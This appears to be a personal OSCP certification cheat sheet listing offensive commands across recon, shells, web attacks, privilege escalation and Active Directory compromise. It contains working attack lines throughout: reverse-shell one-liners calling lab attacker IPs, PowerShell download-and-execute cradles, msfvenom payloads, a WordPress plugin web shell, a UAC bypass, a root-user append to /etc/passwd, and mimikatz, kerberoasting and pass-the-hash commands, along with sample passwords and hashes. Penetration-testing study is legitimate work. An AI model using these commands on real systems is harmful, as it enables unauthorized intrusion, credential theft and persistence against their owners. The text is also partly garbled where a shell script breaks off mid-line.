# OSCP Recipe 2023 Date: 20230921 *** ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@192.168.212.45 ssh bob@10.11.1.136 -oKexAlgorithms=+diffie-hellman-group1-sha1 sudo tcpdump -nnvvvAi tun0 udp port *** --- ## REFS https://github.com/swisskyrepo/PayloadsAllTheThings https://gtfobins.github.io/ https://book.hacktricks.xyz/welcome/readme --- ## 6. Information Gathering --- ### RustScan wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb sudo dpkg -i rustscan_2.0.1_amd64.deb rustscan rustscan -a 192.168.220.151 -u 5000 -t 8000 --scripts none rustscan -a 192.168.220.151 -u 5000 -t 8000 --scripts -- -n -Pn -sVC -oG 151_ports.txt --- ### PowerShell Scan 1..254 | % {"10.0.1.$_"} --- https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Invoke-Ping.ps1 Measure-Command { Invoke-Ping (1..254 | % {"192.168.190.$_"}) -Quiet -Timeout 40 -throttle 200 } | Select -Property TotalSeconds --- https://raw.githubusercontent.com/RamblingCookieMonster/Invoke-Parallel/master/Invoke-Parallel/Invoke-Parallel.ps1 Measure-Command { 1..1024 | Invoke-Parallel -ScriptBlock {echo ((New-Object Net.Sockets.TcpClient).Connect("127.0.0.1", $_)) "TCP port $_ is open"} 2>$null -throttle 200 } | Select -Property TotalSeconds --- ### SMB smbclient -N -L 192.168.220.13 smbclient -N //192.168.220.13/files smbclient //192.168.220.13/files -U %[password] for i in $(cat smb_list.txt); do (echo $i;smbclient -N -L $i;echo); done --- ### NetBIOS Name Query nmblookup nbtscan --- ### Detailed Enumeration nmap 10.11.1.115,136 -n -sV -p139,445 --script smb-protocols enum4linux 192.168.220.13 > https://github.com/cddmp/enum4linux-ng ./enum4linux-ng.py 192.168.220.13 enum4linux -o 10.11.1.x enum4linux -A 10.11.1.x crackmapexec --- ### Swiss Army Knife SMTP sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap --- ### RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f rdesktop 10.11.1.x -g 93% -u administrator -p password xfreerdp /cert-ignore /v:192.168.219.75 /d:corp.com /u:jeff /p:'HenchmanPutridBonbon11' --- ### File Sharing impacket-smbserver -smb2support -user user -password user share . python3 -m http.server 8000 python2 -m SimpleHTTPServer 8000 twist3 ftp -p21 -r Downloads /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/ --- ### File Download One-Liner certutil.exe -urlcache -f http://192.168.119.133/plink.exe plink.exe echo get nc.exe nc.exe | ftp -A 192.168.1.1 IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell IEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell iwr -Uri "http://www.contoso.com" -OutFile "C:\path\file" file_put_contents("/tmp/phpexec.php", file_get_contents("http://192.168.119.235/phpexec.php")); wget --no-check-certificate https:// --- ### SHELL msfvenom -p windows/shell_reverse_tcp lhost=192.168.49.90 lport=8888 -f exe > res.exe msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.133 LPORT=4444 -f asp -o plzrs.asp windows/shell_reverse_tcp windows/x64/shell_reverse_tcp linux/x86/shell/reverse_tcp linux/x64/shell_reverse_tcp --- sudo apt install rlwrap rlwrap -cAr nc -nvlp8888 --- wmic process call create "C:\Users\alice\nc.exe 192.168.119.226 8889 -e cmd.exe" /bin/bash -i > /dev/tcp/192.168.119.x/8888 0<&1 2>&1 /bin/bash -c 'bash -i > /dev/tcp/192.168.119.x/8888 0<&1 2>&1' mknod /tmp/backpipe p;ls -lh /tmp /bin/bash 0< /tmp/backpipe 2>&1 | nc 192.168.119.126 8888 1> /tmp/backpipe mkfifo /tmp/p;ls -lh /tmp nc 192.168.15.1 8888 0/tmp/p 2>&1 --- ### [full-tty](https://0xffsec.com/handbook/shells/full-tty/) script -c /bin/bash -q /dev/null --- python --version [2>&1] python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' --- ### Windows FTP non-interactive download echo open 10.11.0.4 21> ftp.txt echo USER offsec>> ftp.txt echo lab>> ftp.txt echo bin >> ftp.txt echo GET nc.exe >> ftp.txt echo bye >> ftp.txt `C:\> ftp -v -n -s:ftp.txt` --- ``` Shell Script #!/bin/bash if [ -z $4 ] then echo echo "Automatic FTP Upload Script!!" echo echo "Usage: $0 " echo exit 0 fi HOST=$1 USER=$2 PASSWORD=$3 FILENAME=$4 ftp -inv $HOST <' --- [Windows Path Traversal Cheatsheet](https://gist.github.com/SleepyLctl/823c4d29f834a71ba995238e80eb15f9#file-windows-path-traversal-cheatsheet) --- ### Gobuster gobuster dir -u http://offsecwp -w /usr/share/dirb/wordlists/common.txt gobuster dir -u http://offsecwp -w /usr/share/dirb/wordlists/common.txt -r -f -x php,aspx,jsp gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern gobuster dir -f -r -x .php,.html -w /usr/share/dirb/wordlists/common.txt -u http://10. /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --proxy socks5://127.0.0.1:1080 --- ### WordPress Malicious Plugin [Plugin File Editor][Hello Dolly] echo system($_GET[1]); die(); [plugins] Activate `Hello Dolly` http://host.domain.com/wordpress/wp-content/plugins/hello.php?1=whoami --- Write a web shell with a malicious plugin. Copy a plugin shell from SecLists and zip it: > https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/WordPress/plugin-shell.php $ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php . $ zip plugin-shell.zip plugin-shell.php Upload plugin-shell.zip (Plugins > Add New) and install it (Upload Plugin > Browse... > Install Now) but do not activate! Now you can access the web shell: $ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami' --- wpscan --url http://sandbox.local -e u,t,ap,cb,dbe wpscan --url http://192.168.218.244/ -e p --plugins-detection aggressive --- ## 10. SQL Injection Attacks mysql -u root -p'root' -h 192.168.50.16 -P 3306 impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth EXECUTE sp_configure 'show advanced options',1; RECONFIGURE;sp_configure 'xp_cmdshell',1;RECONFIGURE; --- ## 12. Locating Public Exploits searchsploit ubuntu 10 local escalation searchsploit linux kernel ubuntu 16.04 searchsploit ossec | grep -v '/dos/' searchsploit linux kernel | grep -v dos | grep ' 3\.' | grep -i 'root\|privilege\|exploit' --- ## 13. Fixing Exploits Using EoL Python Versions on Kali https://www.kali.org/docs/general-use/using-eol-python-versions/ --- ### Python Virtualenv mkdir .py2env;cd .py2env virtualenv --python=python2 env source env/bin/activate mkdir .py3env;cd .py3env virtualenv --python=python3 env source env/bin/activate pip --version deactivate --- sudo apt install mingw-w64 --- sudo apt install wine dpkg --add-architecture i386 && apt-get update && apt-get install wine32 --- ## 15. Password Attacks hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" hashcat --help | grep -i "ntlm" hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..." kpcli ## 16. Windows Privilege Escalation ### Displays information about Remote Desktop Session Host servers Query User Query Session --- ### Windows QUERY whoami whoami /priv whoami /groups net user systeminfo wmic OS get OSArchitecture reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Default* reg query HKLM /f password /t REG_SZ /s findstr /S /I cpassword \\\sysvol\\policies\*.xml `WIN` + `R`: msinfo32 shutdown /r /t 0 mountvol --- ipconfig /all route print netstat -ano netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all icacls --- powershell -nop -ep bypass [-w hidden] Get-LocalUser Get-LocalGroup Get-LocalGroupMember adminteam Get-Process Get-ChildItem -Path C:\Test -Name Get-ChildItem -Path C:\Test\*.txt -Recurse -Force Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --- tasklist /svc tasklist /v --- Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname wmic product get name, version, vendor wmic qfe get Caption, Description, HotFixID, InstalledOn accesschk.exe -uws "Everyone" "C:\Program Files" Get-ChildItem "C:\Program Files" Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer --- ### PowerShell Transcription1 Get-History (Get-PSReadlineOption).HistorySavePath Start-Transcript -Path "C:\Users\Public\Transcripts\transcript01.txt" type C:\Users\Public\Transcripts\transcript01.txt Stop-Transcript ### PowerShell Script Block Logging When Script Block Logging is enabled, PowerShell logs the following events to the PowerShellCore/Operational log: EventId: 4104 Get-WinEvent Microsoft-Windows-PowerShell/Operational | Where-Object Id -eq 4104 https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.2 --- wmic service get name,displayname,startname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} Get-CimInstance -ClassName win32_service | Select Name,State,PathName wmic service get /? wmic service where caption="Serviio" get name, caption, state, startmode wmic service where started=true get name,startname,pathname --- schtasks /query /fo LIST /v C:\Windows\System32\Tasks --- powershell.exe Start-Process cmd.exe -Verb runAs --- ### fodhelper.exe Bypass UAC REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f --- [Windows Privilege Escalation](https://gist.github.com/sckalath/8dacd032b65404ef7411) --- ## 17. Linux Privilege Escalation --- ### Determine the Current Shell in Linux echo $0 --- ### LINUX QUERY [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) local-network-process-file-package-module-volume --- id pwd sudo -l ls -lah /etc/shadow /etc/shadow cat /etc/passwd cat /etc/passwd | grep -vE "nologin|false" hostname hostname -f cat /etc/issue cat /etc/*lease lsb_release -a uname -r uname -i uname -a arch env cat .bashrc ps aux ps -ef ip ro ss -anp netstat -antup lsof -inP cat /proc/net/arp cat /etc/iptables cat /etc/iptables/rules.v4 find / -name *iptables* 2>/dev/null ls -lah /etc/cron* crontab -l cat /etc/crontab grep -i "cron" /var/log/cron.log grep -i "cron" /var/log/syslog dpkg -l rpm -qa find /home -ls 2> /dev/null find / -writable -type d 2> /dev/null find / ! -path "/proc/*" -user root -writable -ls 2> /dev/null find / ! -path "/proc/*" -user root -perm -04000 -ls 2> /dev/null find / -perm -u=s -type f -ls 2>/dev/null find . -iname '*config*' -ls 2>/dev/null cat /etc/fstab mount lsblk lsmod /sbin/modinfo libata unix-privesc-check --- openssl passwd w00t echo "toor:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd /usr/sbin/getcap -r / 2>/dev/null --- ### Precompiled Exploit https://github.com/lucyoa/kernel-exploits https://github.com/SecWiki/linux-kernel-exploits https://gitlab.com/exploit-database/exploitdb-bin-sploits https://github.com/bsauce/kernel-exploit-factory --- ## 18. Port Redirection and SSH Tunneling ### sshuttle .ssh/config ```conf Host SEAN Hostname 10.11.1.251 User sean Host LUIGI Hostname 10.1.1.1 Port 22 User root ProxyCommand ssh -W %h:%p SEAN ``` sshuttle r LUIGI 10.3.3.0/24 --- ## 19. Tunneling Through Deep Packet Inspection chisel.exe client 192.168.45.197:22 R:9050:socks --- ## 21. Active Directory Introduction and Enumeration Import-Module .\PowerView.ps1 ### Basic Get-NetDomain Get-NetUser Get-NetUser | select cn Get-NetUser | select cn,pwdlastset,lastlogon Get-NetGroup | select cn Get-NetGroup "Sales Department" | select member ### Operating Systems Get-NetComputer Get-NetComputer | select operatingsystem,dnshostname ### Permissions and Logged on Users Find-LocalAdminAccess Get-NetSession -ComputerName files04 Get-NetSession -ComputerName files04 -Verbose Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion .\PsLoggedon.exe \\files04 ### Service Principal Names setspn -L iis_service Get-NetUser -SPN | select samaccountname,serviceprincipalname nslookup.exe web04.corp.com ### Object Permissions Get-ObjectAcl -Identity stephanie Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights ### Domain Shares Find-DomainShare cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml cpassword gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" ### BloodHound sudo neo4j start . .\SharpHound.ps1 Invoke-BloodHound -c all match p=(a:Computer)-[r:HasSession]->(b:User) return p --- ## 22. Attacking Active Directory Authentication privilege::debug sekurlsa::logonpasswords crackmapexec smb ad_ip445.txt -u adusers.txt -p 'Nexus123!' --continue-on-success crackmapexec smb ad_ip445.txt -d corp.com -u jen -p 'Nexus123!' --shares impacket-rdp_check john:easyas123@10.11.1.221 impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force impacket-GetUserSPNs -dc-ip 192.168.50.70 -request -outputfile hashes.kerberoast corp.com/pete sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70 --- ## 23. Lateral Movement in Active Directory wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc" impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73 winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD... HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" nc -lnvp 443 evil-winrm -i 192.168.219.72 -u jen -p 'Nexus123!' crackmapexec winrm 192.168.219.72 -d corp.com -u jen -p 'Nexus123!' -x whoami impacket-dcomexec 'corp.com/jen:Nexus123!'@192.168.219.72 -object MMC20 --- privilege::debug sekurlsa::tickets /export kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi _END_